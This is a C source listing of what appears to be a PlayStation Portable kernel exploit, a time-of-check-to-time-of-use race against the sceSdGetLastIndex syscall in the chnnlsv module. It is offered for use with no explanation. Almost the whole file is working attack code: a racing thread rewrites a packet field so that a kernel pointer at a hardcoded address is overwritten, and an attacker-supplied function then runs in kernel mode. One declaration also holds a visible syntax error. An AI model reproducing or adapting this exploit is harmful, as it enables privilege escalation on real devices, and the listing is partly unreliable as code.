sceSdGetLastIndex

1. //ToCToU kexploit in chnnlsv
2.  
3. int is_exploited;
4. u32 address = 0x8800F71C;
5.  
6. int KernelFunction()
7. {
8.     is_exploited = 1;
9.  
10.     _sw(0x8C654384, address);
11.  
12.     void (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;
13.     void (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;
14.  
15.     _sceKernelDcacheWritebackInvalidateAll();
16.     _sceKernelIcacheInvalidateAll();
17.  
18.     return 0;
19. }
20.  
21. void do_exploit()
22. {
23.     is_exploited = 0;
24.     u32 packet[256];
25.  
26.     //taken from HBL
27.     p5_open_savedata(PSP_UTILITY_SAVEDATA_AUTOLOAD);
28.  
29.     //search for this function in volatile ram
30.     int (* _sceSdGetLastIndex)(u32 a0, u32 a1, u32 a2) = (void *)FindImport("sceChnnlsv", 0xC4C494F8, 1);
31.  
32.     //search for this function in main ram
33.     int (* _sceKernelLibcTime(u32 a0, u32 a1) = (void *)FindImport("UtilsForUser", 0x27CC57F0, 0);
34.  
35.     int store_thread()
36.     {
37.         while (is_exploited != 1) {
38.             packet[9] = address - 18 - (u32)&packet;
39.             sceKernelDelayThread(0);
40.         }
41.  
42.         sceKernelExitThread(0);
43.  
44.         return 0;
45.     }
46.  
47.     SceUID storethread = sceKernelCreateThread("store thread", store_thread, 8, 512, THREAD_ATTR_USER, NULL);
48.     sceKernelStartThread(storethread, 0, NULL);
49.  
50.     while (is_exploited != 1) {
51.         packet[9] = 16;
52.         _sceSdGetLastIndex(packet, (u32)packet + 40, (u32)packet + 56);
53.         sceKernelDelayThread(0);
54.         _sceKernelLibcTime(0, (u32)&KernelFunction | (u32)0x80000000);
55.         sceKernelDcacheWritebackAll();
56.     }
57.  
58.     //taken from HBL
59.     p5_close_savedata();
60.  
61.     sceKernelDeleteThread(storethread);
62. }
63.  
64. void _start __attribute__ ((section(".text.start")));
65. void _start()
66. {
67.     do_exploit();
68.     sceKernelExitGame();
69. }